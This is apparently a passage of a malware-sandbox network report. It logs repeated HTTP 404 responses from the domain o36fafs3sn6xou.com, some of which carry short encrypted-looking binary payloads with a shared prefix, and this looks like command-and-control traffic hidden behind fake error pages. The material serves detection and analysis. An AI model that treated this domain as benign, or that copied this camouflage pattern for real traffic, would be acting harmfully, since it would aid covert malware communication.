                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:01 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 32 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 37Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e f8 91 ab fd b0 54 4a b3 dd 64 f8 f7 10 74 94 f2 83 Data Ascii: %S`Nh&WQY^TJdt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e2 93 b4 fa b1 1d 4c ae 9e 28 fa f7 52 68 93 e3 84 e1 75 Data Ascii: %S`Nh&WQY^L(Rhu
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 86 bb fa a5 15 45 a9 c4 22 fa f4 53 33 85 a5 88 f1 36 f0 85 88 b9 Data Ascii: %S`Nh&WQY^E"S36
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:14 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1b f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df ac 35 85 47 bd aa 20 25 c6 77 1e 8d 1a 3e e4 95 c1 4a d5 b3 18 c6 c7 93 b1 6f f0 5d 64 a2 99 c1 cf c1 e2 19 96 6c f3 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"5G %w>Jo]dl?
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:18 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 46Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 40 b2 d0 f6 a0 e0 54 18 e8 86 65 a4 ac 45 75 9c e3 87 bb 32 b1 8c 84 f2 68 b9 46 Data Ascii: %S`Nh&WQL@TeEu2hF
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 48Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 d5 f9 72 b4 a6 8a f3 4c ef 46 86 aa Data Ascii: %S`Nh&WQY^L8?rLF
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e3 8c ac f0 ba 1e 46 af c4 32 fe b4 1e 35 9c a5 93 f3 3b ae 91 9d e5 23 a4 5b 9b Data Ascii: %S`Nh&WQY^F25;#[
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 79Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 92 c7 2b 8c b9 b8 f3 3c f8 42 c9 f6 0c 7d db 77 57 8f 4a 65 e0 98 93 4b da fb 1e c9 90 cf e1 69 ff 0e 61 af 80 f3 b2 a3 c2 26 a1 Data Ascii: %S`Nh&WQY^L8?+<B}wWJeKia&
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:34 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:36 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:36 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 15:58:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
